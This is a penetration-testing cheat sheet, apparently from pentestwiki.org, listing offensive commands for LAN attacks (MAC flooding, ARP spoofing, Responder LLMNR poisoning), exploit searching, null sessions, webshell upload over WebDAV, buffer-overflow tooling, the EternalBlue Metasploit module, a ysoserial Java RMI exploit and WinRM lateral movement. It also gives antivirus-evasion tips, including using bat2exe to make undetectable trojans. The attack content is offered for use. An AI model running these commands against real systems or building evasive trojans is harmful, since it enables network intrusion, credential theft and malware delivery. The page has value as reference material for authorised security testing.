From pentestwiki.org

Physical access (LAN)

MAC flooding

root #macof -n 1000


root #arpspoof

root #ettercap

LLMNR poisoning

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

root #responder -I eth0 -rv


Find exploits

In kali:

root #searchsploit <SERVICE NAME>


site:exploit-db.com APP VERSION
$linux-exploit-suggester.sh -k 2.6.9

C:>windows-exploit-suggester.py -i <systeminfo file>


NULL session

C:>net use \\$IP\ipc$ "" "/user:"


$cadaver http://$IP
dav:/> put webshell.aspx


To crosscompile windows exploits in linux:

First install the package:

root #apt-get install mingw-w64

  • Command line for C:
$i686-w64-mingw32-gcc -lws2_32 -o 100 100.c

Useful flags:

-l ws2_32 -l mswsock
  • Command line for C++:
$i686-mingw32-g++ main.cpp -o main -static

py2exe http://www.py2exe.org/


Reversing in Linux



Useful commands:

is: Show symbols
iS: Show sections
ii: Show imports
iI: Binary info
ia: Show all info
i?: All commands starting with i


$/usr/share/metasploit-framework/tools/exploit/egghunter.rb -f python -e W00T

Buffer Overflow offsets:

$/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 256
$/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 256 -q 773870B4

Reversing in Windows


  • IDA Pro
  • OllyDbg
  • Immunity Debugger
  • mona.py Corelan Repository for mona.py
  • API Monitor is a free software that lets you monitor and control API calls made by applications and services. Its a powerful tool for seeing how applications and services work or for tracking down problems that you have in your own applications

Reversing .NET



  • sfuzz (kali)
  • radamsa
  • spike


AFL is a popular fuzzing tool for coverage-guided fuzzing. The tool combines fast target execution with clever heuristics to find new execution paths in the target binary. It has been successfully used to find a large number of vulnerabilities in real products.

AV Evasion

  • Veil: Encrypts/Encode/Obfuscate msfvenom-like payloads

Thanks @ReneFreingruber

To remove /var/lib/veil strings and make reverse engineering harder:

-gcflags=-trimpath=/var/lib/veil -asmflags=-trimpath=/var/lib/veil
  • bat2exe

Do a bat script with your trojan and use bat2exe to get an FUD to trojanize an exe or service. https://github.com/islamadel/bat2exe/blob/master/upload/bat2exe.exe

  • Phantom evasion

https://github.com/oddcod3/Phantom-Evasion Interacts with msfvenom.

SMB exploitation

Eternalblue (Target: Windows 7 and Server 2008 R2 (x64) All Service Packs):

msf>use exploit/windows/smb/ms17_010_eternalblue

$nmap -sS -T4 --open -p 139,445 --script=smb-vuln-conficker,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-regsvc-dos --script-args=unsafe=1 $IP/24


Java RMI

Nmap will recognize it as:

XXXX/tcp  open  rmiregistry       Java RMI

Exploiting RMI

  • With nmap:
    root #nmap --script=rmi-vuln-classloader -p 1099 $IP
    root #nmap --script=rmi-dumpregistry -p 1099 $IP
  • With metasploit:
    msf>use exploit/multi/misc/java_rmi_server
  • With ysoserial:
    $java -cp ysoserial.jar ysoserial.RMIRegistryExploit $IP 1098 CommonsCollections1 calc.exe
  • With java monitoring and performance console (OS performance and application parameters):



  • PS>winrs -r:$HOST $CMD
  • PS>Test-WSMan -ComputerName $HOST

More info about WinRM lateral movement: https://www.hackingarticles.in/winrm-penetration-testing/